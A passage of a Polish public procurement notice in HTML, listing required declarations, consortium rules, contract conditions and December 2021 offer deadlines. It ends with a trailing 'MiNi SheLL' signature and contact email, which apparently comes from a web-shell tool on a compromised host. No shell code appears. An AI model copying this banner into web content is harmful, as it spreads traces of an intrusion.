innego dokumentu potwierdzającego rozpoczęcie działalności bankowej przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo Bankowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przedmiotowym postępowaniu Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	„Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu” (oświadczenie o którym mowa w art. 125 ust 1 ustawy Pzp) wg wzoru stanowiącego Załącznik Nr 2 do SWZ.<br/><br/>W przypadku oferty składanej wspólnie (np. przez konsorcjum) „Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu” (oświadczenie, o którym mowa w art. 125 ust 1 ustawy Pzp) składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/><br/>W sytuacji o której mowa w pkt 15.3 SWZ Wykonawca wraz z ww. oświadczeniem dołącza do oferty, dowody, że spełnił łącznie przesłanki o których mowa w pkt 15.3 SWZ.<br/><br/>2)	w celu potwierdzenia, że osoba działająca w imieniu wykonawcy, wykonawcy wspólnie ubiegającego się o udzielnie zamówienia jest umocowana do jego reprezentowania – odpis/y lub informacja/e z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/><br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a wykonawca wskaże w ofercie dane umożliwiające dostęp do tych dokumentów.<br/>W przypadku wskazania przez wykonawcę dostępności dokumentów, o których mowa powyżej, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający będzie żądać przedstawienia tłumaczenia na język polski pobranych samodzielnie dokumentów.<br/><br/>3)	jeżeli osoba (osoby) podpisująca ofertę działa na podstawie pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy - pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy,<br/><br/>4)	jeżeli osoba (osoby) podpisująca dokumenty lub oświadczenia dotyczące wykonawcy wspólnie ubiegającego się o udzielenie zamówienia działa na podstawie pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy wspólnie ubiegającego się o udzielenie zamówienia - pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy wspólnie ubiegającego się o udzielenie zamówienia,<br/><br/>5)	w przypadku gdy Wykonawcy wspólnie będą ubiegać się o udzielenie zamówienia - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/><br/>6)	w przypadku, o którym mowa w pkt 12.9.3 SWZ - oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy (oświadczenie o którym mowa w art. 117 ust 4 ustawy Pzp), <br/><br/>7)	inne – wg potrzeb i postanowień niniejszej SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty składanej wspólnie (np. przez konsorcjum), Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (zgodnie z art. 58 ust. 2 ustawy – Prawo zamówień publicznych).<br/><br/>W takim przypadku do oferty należy dołączyć pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/><br/>Pełnomocnictwo może również wynikać z innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>Przyjmuje się, że ww. pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego obejmuje również pełnomocnictwo (umocowanie) do podpisania oferty.<br/><br/>W takim przypadku wszelka korespondencja będzie prowadzona z Pełnomocnikiem.<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie Umowy zgodnie z jej postanowieniami.<br/><br/>2 W przypadku oferty składanej wspólnie (np. przez konsorcjum) każdy wykonawca wspólnie ubiegający się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na postawie art. 108 ust. 1 ustawy Prawo zamówień publicznych. <br/> <br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w pkt 21.2.1 SWZ będzie spełniony, jeżeli każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o których mowa w pkt 21.2.1 SWZ. <br/><br/>Warunek określony w pkt 21.2.1 SWZ, będzie także spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia, o których mowa w pkt 21.2.1 SWZ, i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (oświadczenie o którym mowa w art. 117 ust 4 ustawy Pzp) . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z dokumentami zamówienia tj. zapisami projektowanych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-20 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-20 14:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com